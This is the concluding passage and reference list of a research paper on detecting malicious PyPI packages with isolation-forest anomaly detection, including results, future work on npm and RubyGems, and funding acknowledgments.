We crawl all packages in the PyPI ecosystem and establish preliminary criteria for judging the suspicious or malicious behavior of packages by analyzing the behavioral features of the disclosed malicious pip packages. We combine two techniques, AST and RegExp, to extract code features and construct feature sets together with package name features. Finally, by using the iForest algorithm, which performs well under multi-dimensional features, we find some malicious pip packages lurking in the PyPI ecosystem. Although only a limited number of malicious pip packages are detected, the results demonstrate that our approach works. We have analyzed the lifecycle of the pip installation process, which starts with a one-click command (e.g., pip install requests) entered by end-users. While collecting samples, we found two types of installation packages (tar.gz, whl/zip) in the PyPI ecosystem and proposed a solution to extract the complete setup.py code for each of them.

Following these findings, we propose and implement a pip poisoning detection approach based on the iForest algorithm, and combine it with multiple reverse cross-validation and de-duplication to ensure the validity of the results. From 228,723 pip packages, we obtain 5,699 packages awaiting manual review. After reviewing them, we find 301 undisclosed suspicious or malicious packages. For the managers of the PyPI ecosystem, if the task is to evaluate the entire community, our approach reduces the workload by 97.51%.

B. Future Work

When dealing with malicious packages that have fewer features, our approach performs poorly, which might be caused by the fact that we are using an anomaly detection mindset. Our approach is based on the assumption that malicious/anomalous packages are similar to one another but different from benign/normal packages. However, the majority of malicious packages are functionally complex, so those with fewer functions are difficult for us to detect. In future work, we intend to tackle this problem from the dimension of code similarity. During our experiments, we found that the malicious code parts in most malicious packages are similar. For example, the packages libcurl, libhtml5, mateplotlib, numipy, etc. all contain the function checkVersion().

At the same time, we notice that such poisoning of package registries is also serious in npm and RubyGems [2]. We have done a preliminary evaluation of the npm ecosystem while improving the PPD. After randomly selecting 300,000 packages, we found 16 suspicious or malicious npm packages. One of them, named monent, has been removed. We will continue to adapt our methodology to better detect malicious packages lurking in npm and RubyGems.

ACKNOWLEDGMENT

This research is funded by the National Natural Science Foundation of China (No. 61902265) and the Sichuan Science and Technology Program (No. 2020YFG0047, No. 2020YFG0374).

REFERENCES

[1] I. TIOBE, “Tiobe index,” Retrieved from Tiobe Index: https://www.tiobe.com/tiobe-index, 2020.
[2] R. Duan, O. Alrawi, R. P. Kasturi, R. Elder, B. Saltaformaggio, and W. Lee, “Towards measuring supply chain attacks on package managers for interpreted languages,” NDSS, 2021.
[3] I. Pashchenko, D.-L. Vu, and F. Massacci, “A qualitative study of dependency management and its security implications,” in Proceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security, 2020, pp. 1513–1531.
[4] M. Zimmermann, C.-A. Staicu, C. Tenny, and M. Pradel, “Small world with high risks: A study of security threats in the npm ecosystem,” in 28th USENIX Security Symposium (USENIX Security 19), 2019, pp. 995–1010.
[5] A. Almubayed, “Practical approach to automate the discovery and eradication of opensource software vulnerabilities at scale,” Blackhat USA, 2019.
[6] T. S. R. C. Xnianq, “Pypi official repository is poisoned by covd malicious packages,” Retrieved from: https://security.tencent.com/index.php/blog/msg/170, 2020.
[7] D.-L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, “Typosquatting and combosquatting attacks on the python ecosystem,” in 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW). IEEE, 2020, pp. 509–514.
[8] M. Čarnogurskỳ, “Attacks on package managers.”
[9] E. Debuggers, “Don’t pip install ‘request’ instead of ‘requests’. It is a trojan!” Retrieved from: https://ethicaldebuggers.com/dont-pip-install-request-instead-of-requests-it-is-a-trojan/, 2020.
[10] M. Taylor, R. K. Vaidya, D. Davidson, L. De Carli, and V. Rastogi, “Spellbound: Defending against package typosquatting,” arXiv preprint arXiv:2003.03471, 2020.
[11] M. Ohm, A. Sykosch, and M. Meier, “Towards detection of software supply chain attacks by forensic artifacts,” in Proceedings of the 15th International Conference on Availability, Reliability and Security, 2020, pp. 1–6.
[12] D. L. Vu, I. Pashchenko, F. Massacci, H. Plate, and A. Sabetta, “Towards using source code repositories to identify software supply chain attacks,” in Proceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security, 2020, pp. 2093–2095.
[13] K. Garrett, G. Ferreira, L. Jia, J. Sunshine, and C. Kästner, “Detecting suspicious package updates,” in 2019 IEEE/ACM 41st International Conference on Software Engineering: New Ideas and Emerging Results (ICSE-NIER). IEEE, 2019, pp. 13–16.
[14] O. Foundation and other contributors, “Postmortem for malicious packages published on july 12th, 2018,” Retrieved from: https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes, 2018.
[15] H. Denbraver, “Malicious packages found to be typo-squatting in python package index,” Retrieved from: https://snyk.io/blog/malicious-packages-found-to-be-typo-squatting-in-pypi, 2019.
[16] A. Bannister, “Dependency confusion attack mounted via pypi repo exposes flawed package installer behavior,” Retrieved from: https://portswigger.net/daily-swig/dependency-confusion-attack-mounted-via-pypi-repo-exposes-flawed-package-installer-behavior, 2021.
[17] M. Ohm, H. Plate, A. Sykosch, and M. Meier, “Backstabber’s knife collection: A review of open source software supply chain attacks,” in International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment. Springer, 2020, pp. 23–43.
[18] F. T. Liu, K. M. Ting, and Z.-H. Zhou, “Isolation forest,” in 2008 Eighth IEEE International Conference on Data Mining. IEEE, 2008, pp. 413–422.
[19] Z. Zou, Y. Xie, K. Huang, G. Xu, D. Feng, and D. Long, “A docker container anomaly monitoring system based on optimized isolation forest,” IEEE Transactions on Cloud Computing, 2019.
[20] S. Ahmed, Y. Lee, S.-H. Hyun, and I. Koo, “Unsupervised machine learning-based detection of covert data integrity assault in smart grid networks utilizing isolation forest,” IEEE Transactions on Information Forensics and Security, vol. 14, no. 10, pp. 2765–2777, 2019.
[21] E. Zhong, W. Fan, Q. Yang, O. Verscheure, and J. Ren, “Cross validation framework to choose amongst models and datasets for transfer learning,” in Joint European Conference on Machine Learning and Knowledge Discovery in Databases. Springer, 2010, pp. 547–562.
